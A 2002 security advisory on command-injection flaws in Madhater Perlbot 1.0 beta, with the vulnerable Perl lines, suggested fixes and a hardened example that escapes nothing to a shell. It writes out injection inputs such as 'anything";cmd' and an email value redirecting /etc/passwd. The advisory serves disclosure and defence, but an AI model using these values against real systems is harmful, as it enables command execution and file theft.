[UNIX] Madhater Perlbot Remote Command Execution

From: support@securiteam.com
Date: 10/19/02


From: support@securiteam.com
To: list@securiteam.com
Date: 19 Oct 2002 03:36:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Madhater Perlbot Remote Command Execution
------------------------------------------------------------------------

SUMMARY

A security vulnerability in Madhater's Perlbot
(<http://stigmata.gothcafe.com/~madhater/>) allows remote attackers to cause
the product to execute arbitrary code.

DETAILS

Vulnerable systems:
 * Perlbot version 1.0 beta

1. Because user input is not filtered before it is passed to the shell, the
script can be used to execute any command it has permission to run.

A more detailed explanation:
The script does not limit the characters sent to the shell from user
input. The problem is in this line:

 foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

This allows an attacker to "break out" of the quotes and issue any command
they wish by supplying input such as anything";cmd. Other abuses are
possible with `cmd`, $(cmd), or \xxx where xxx is the octal value of any
character. Some form of user input filtering must be used.

2. Because input is not filtered and an unsafe open() call is used when the
script attempts to send email, command execution is possible.

A more detailed explanation:
The script attempts to send an email to the user. It takes the user's
email address and passes it to the shell as an argument to the mail
program:

 open (MAIL,"| $sendmail $recipient") || die $!;

This means that something like hacker@scan-associates.net < /etc/passwd
could be used as an email address to obtain any file on the system that the
script has permission to read. Command execution is also possible with
hacker@scan-associates.net ;cmd. To prevent this, simply take the
$recipient value out of the shell call.

Fix:
According to the author, a fix could be included in a new version of the
script. The script's homepage was down at the time of this advisory, so
here is the suggested fix. Replace the following line:

 my $word=$';

With:

 my $word=$';
 $word =~ s/[^\w]//g;

And replace the following line:

 open (MAIL,"| $sendmail $recipient") || die $!;

With:

 open (MAIL,"| $sendmail -t") || die $!;
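
The two call sites rewritten so that user input never reaches a shell, as an
added example that is not the Perlbot author's code: the spell-check uses
IPC::Open2 to run ispell directly and writes the word to its stdin, and the
mail step uses Perl's list-form open so the validated recipient is a single
argv element rather than part of a shell command line. The program paths,
the sendmail option (-oi) and the address pattern are assumptions.

```perl
#!/usr/bin/perl
# Added example, not the Perlbot author's code; program paths are assumed.
use strict;
use warnings;
use IPC::Open2;

my $ISPELL   = '/usr/local/bin/ispell';   # path as quoted in the advisory
my $SENDMAIL = '/usr/sbin/sendmail';      # assumed location

# The advisory's whitelist filter: keep only [A-Za-z0-9_].
sub sanitize_word {
    my ($word) = @_;
    $word =~ s/[^\w]//g;
    return $word;
}

# Spell-check without /bin/echo or a shell: open2 exec()s ispell directly,
# so quotes, ';', backticks and $(...) in $word are inert.
sub spellcheck {
    my $word = sanitize_word(shift);
    return () unless length $word;
    my $pid = open2(my $out, my $in, $ISPELL, '-a');
    print {$in} "$word\n";
    close $in;
    my @reply = <$out>;
    close $out;
    waitpid $pid, 0;
    return @reply;
}

# Accept only a conservative address shape; anything else (spaces, ';',
# '<', newlines) is rejected outright rather than "cleaned".
sub valid_recipient {
    my ($addr) = @_;
    return $addr =~ /\A[\w.+-]+@[\w-]+(?:\.[\w-]+)+\z/ ? 1 : 0;
}

# List-form open: $recipient is passed straight to execve(), never parsed
# by a shell, so "< /etc/passwd" or ";cmd" cannot be interpreted.
sub send_mail {
    my ($recipient, $body) = @_;
    die "refusing bad recipient\n" unless valid_recipient($recipient);
    open(my $mail, '|-', $SENDMAIL, '-oi', $recipient)
        or die "cannot run sendmail: $!";
    print {$mail} "To: $recipient\nSubject: Perlbot\n\n$body\n";
    close $mail or die "sendmail exited with status $?\n";
}

# Self-check of the two input filters (needs no external programs).
print sanitize_word(q{anything";cmd}), "\n";
print valid_recipient('hacker@scan-associates.net < /etc/passwd'), "\n";
print valid_recipient('user@example.net'), "\n";
```

The address check also rejects newlines, so a recipient cannot smuggle extra header lines into the message handed to sendmail.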

Vendor Contact:
07-22-02 - guejez emailed myneid@gothcafe.com and alerted him of this
vulnerability.
07-22-02 - guejez received email confirming vulnerabilities and stating
fixes could be in new version.

ADDITIONAL INFORMATION

The information has been provided by guejez
(<mailto:guejez@scan-associates.net>).

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.